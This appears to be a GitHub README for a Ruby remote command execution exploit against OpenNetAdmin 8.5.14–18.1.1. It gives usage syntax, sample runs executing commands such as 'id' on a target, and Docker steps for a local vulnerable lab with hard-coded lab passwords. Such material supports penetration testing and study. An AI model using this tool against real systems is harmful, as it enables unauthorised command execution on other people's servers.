sec-it / OpenNetAdmin-RCE

OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

OpenNetAdmin RCE exploit

OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution

[PacketStorm] - [WLB-2021050034]

Usage

$ ruby exploit.rb -h
OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution

Usage:
  exploit.rb exploit <url> <cmd> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb -h | --help

exploit:      Exploit the RCE vuln
version:      Try to fetch OpenNetAdmin version

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <cmd>       Command to execute on the target
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org id
  exploit.rb exploit https://example.org:5000/ona 'touch hackproof'
  exploit.rb version https://example.org:5000/ona

Exploit example:

$ ruby exploit.rb exploit http://localhost:8667/ona/ id
[+] Command output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Version fetching example:

$ ruby exploit.rb version http://localhost:8667/ona/
18.1.1

Requirements

Example using gem:

$ gem install httpx docopt

Docker deployment of the vulnerable software

The docker container requires that /etc/localtime and /etc/localtime are set on your host, so that PHP can use them to get the right timezone info.

Warning: of course this setup is not suited for production usage!

With docker-compose (recommended)

Start the containers and launch the config script.

$ sudo docker-compose up -d
$ sudo docker exec -ti ona-app ./init_conf.sh
$ sudo docker restart ona-app

Then follow ONA Web Installation guide to complete your setup: http://localhost:8667/ona/.

  • use sudo docker inspect ona-db | grep IPAddress to get the bridged IP address of the mariadb container
  • re-use the root mysql pass: 58z5J94GBcM8Hx
  • set any random app db user pass: dDqE4bka4ntUqF

Now the app default creds will be: admin / admin. But we won't need them.

With docker alone

Download, install and start ONA:

$ sudo docker pull raabf/ona:v18.1.1
$ sudo docker run -d --publish 127.0.0.1:8667:80 -v /etc/timezone:/etc/timezone:ro -v /etc/localtime:/etc/localtime:ro --name ona-app raabf/ona:v18.1.1
$ sudo docker exec -ti ona-app ./init_conf.sh
$ sudo docker restart ona-app

Then install a database (MariaDB MySQL):

$ sudo docker pull mariadb:10.5
$ sudo docker run -p 127.0.0.1:3306:3306 --name ona-db -e MYSQL_ROOT_PASSWORD=58z5J94GBcM8Hx -d mariadb:10.5

Finally follow the same setup step as for docker-compose method.

References

This is a better re-write of the original exploit [EDB-47691] [PacketStorm].

Some great analysis of the orginal exploit and vulnerability:

Challenges using the vulnerable software:

OpenNetAdmin: source - vulnerable version tarball.

Metasploit: EDB-47772 - updated version

About

OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution

License:MIT License


Languages

Language:Ruby 100.0%